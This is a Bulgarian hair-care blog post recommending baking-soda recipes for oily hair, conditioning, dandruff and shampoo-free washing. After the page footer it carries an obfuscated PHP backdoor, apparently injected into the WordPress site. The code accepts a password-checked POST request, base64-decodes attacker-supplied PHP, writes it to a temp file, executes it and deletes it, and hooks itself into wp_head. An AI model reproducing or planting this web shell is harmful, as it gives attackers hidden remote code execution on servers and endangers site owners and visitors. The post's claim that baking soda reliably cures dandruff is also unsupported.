Как да имаме красива и здрава коса със сода бикарбонат! Няколко рецепти: | Косопад

Как да имаме красива и здрава коса със сода бикарбонат! Няколко рецепти:

Сода бикарбоната има множество приложения извън кухнята. Може да се използва за приготвянето на много и различни домашни козметични рецепти.

Нека разгледаме няколко начина, по които можем да използваме ценната съставка, за да имаме здрава и красива коса:

  1. Почиства косата идеално

Ако косата ви бързо се омазнява, можем да използваме малко сода бикарбонат, за да си решим проблема. Достатъчно е да добавим малко количество към шампоана, когато си мием косата. Почиства корените от наслоените мазнини и контролира образуването им. Косата ни става чиста, блестяща и с обем.

  1. Още една рецепта при мазна коса

Смесете 1 чаша вода с 2 лъжички сода бикарбонат. Сипете сместа в шише с пулверизатор. Пръскайте с него в корените при влажна коса, 10 минути преди да я измиете с шампоан. Направете лек масаж с пръсти и изплакнете.

  1. Мощен балсам

Можем да подобрим значително действието на балсама ни, като му добавим малко сода бикарбонат. Трябва само да смесим 1 част балсам с 1 равна част сода бикарбонат.  Нанася се след шампоана и се оставя да стои 5- 10 минути. След това се плакне.

  1. Сода бикарбонат срещу пърхот

Проблемът с пърхота трудно се разрешава, въпреки че на пазара има изобилие от такива козметични продукти. Причината е, че пърхотът може да се дължи на различни фактори. Сода бикарбоната е много ефективно средство срещу него и всяка от трите рецепти по- горе може да ни помогне и срещу пърхот.

  1. Миене на косата без шампоан

Все повече хора предпочитат да избягват употребата на конвенционалните шампоани. Затова просто смесват малко сода бикарбонат с балсам и така си мият косата.

  1. Почиства идеално от други козметични продукти

Ако често използвате продукти като лак, пяна, гел, боядисвате и пр., е важно да почиствате добре корените от остатъците от тези вещества. Шампоанът не винаги е достатъчен да постигне този ефект. Затова може от време на време да му добавяте малко сода бикарбонат.

19. март 2018 21:52:05 от Надя Колева
Категории: Любопитно за косопада | Етикети: , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}